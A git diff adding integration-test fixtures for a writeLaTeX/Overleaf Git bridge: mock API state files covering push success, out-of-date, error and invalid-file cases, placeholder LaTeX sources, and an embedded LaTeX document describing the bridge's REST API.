+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/state.json
new file mode 100644
index 0000000..45ec2a9
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/state.json
@@ -0,0 +1,45 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3868/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "outOfDate"
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/state.json
new file mode 100644
index 0000000..bdbb321
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/state.json
@@ -0,0 +1,45 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3871/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "error"
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/state.json
new file mode 100644
index 0000000..6203cf5
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSubmoduleFailsWithInvalidGitRepo/state/state.json
@@ -0,0 +1,46 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3875/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json
new file mode 100644
index 0000000..69eb0cc
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json
@@ -0,0 +1,34 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "test@example.com",
+            "name": "Test User"
+        },
+        "getSavedVers": [],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "invalidFiles",
+            "errors": [
+                {
+                    "file": "file1.exe",
+                    "state": "disallowed"
+                }
+            ]
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/state.json
new file mode 100644
index 0000000..6e3ea9a
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushSucceedsAfterRemovingInvalidFiles/validState/state.json
@@ -0,0 +1,29 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "test@example.com",
+            "name": "Test User"
+        },
+        "getSavedVers": [],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/min_mean_wait_evm_7_eps_150dpi.png
new file mode 100644
index 0000000..74e1fcd
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/1234bbccddff/min_mean_wait_evm_7_eps_150dpi.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/state.json
new file mode 100644
index 0000000..f273818
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/rejectV1Repository/state/state.json
@@ -0,0 +1,46 @@
+[
+    {
+        "project": "1234bbccddff",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.333Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "foo/bar/test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3884/state/testproj/min_mean_wait_evm_7_eps_150dpi.png",
+                        "path": "min_mean_wait_evm_7_eps_150dpi.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/foo/bar/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/foo/bar/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/main.tex new file mode 100644 index 0000000..f719efd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/main.tex @@ -0,0 +1 @@ +two diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/state.json new file mode 100644 index 0000000..4dcdc51 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/skipMigrationWhenMigratedFromMissing/state/state.json @@ -0,0 +1,39 @@ +[ + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "migratedFromId": "testprojthatdoesnotexist" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "two\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3882/state/222222222222222222222222/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/state.json new file mode 100644 index 0000000..90fa025 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/state.json @@ -0,0 +1,198 @@ +[ + { + "project": "1826rqgsdb", + "getDoc": { + "versionID": 243, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 243, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + }, + { + "versionID": 185, + "comment": "with more details on POST request", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-11T17:18:40.789Z" + }, + { + "versionID": 175, + "comment": "with updated PUT/POST request", + "email": 
"jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-09T23:09:13.123Z" + }, + { + "versionID": 146, + "comment": "added PUT format", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-07T15:11:35.456Z" + }, + { + "versionID": 74, + "comment": "with example output", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-05T18:09:41.789Z" + }, + { + "versionID": 39, + "comment": "with more files", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-05T18:02:19.123Z" + }, + { + "versionID": 24, + "comment": "first draft", + "email": "jdleesmiller@gmail.com", + "name": "John Lees-Miller", + "createdAt": "2014-11-05T17:56:58.456Z" + } + ], + "getForVers": [ + { + "versionID": 243, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. This endpoint returns the latest version id, when the latest version was created (ISO8601), and the user that last edited the project (if any, otherwise null).\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => {\\n \\\"latestVerId\\\": 39,\\n \\\"latestVerAt\\\": \\\"2014-11-30T18:35:27Z\\\",\\n \\\"latestVerBy\\\": {\\n \\\"email\\\": \\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\": \\\"John Lees-Miller\\\"\\n }}\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. 
(Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: [ {\\n file: the file name from the snapshot,\\n state: \\\"error\\\"|\\\"disallowed\\\"|\\\"unclean_name\\\"\\n }, ... ]\\n}\\nIf the file's error state is unclean_name, the error object will also contain a property cleanFile that contains the name of the file after it has been \\\"cleaned\\\" to meet our file naming requirements; for other file error states, this property is not present.\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n message: short string message for debugging\\n errors: [ array of zero or more string messages for the user ]\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects.
I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 185, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. 
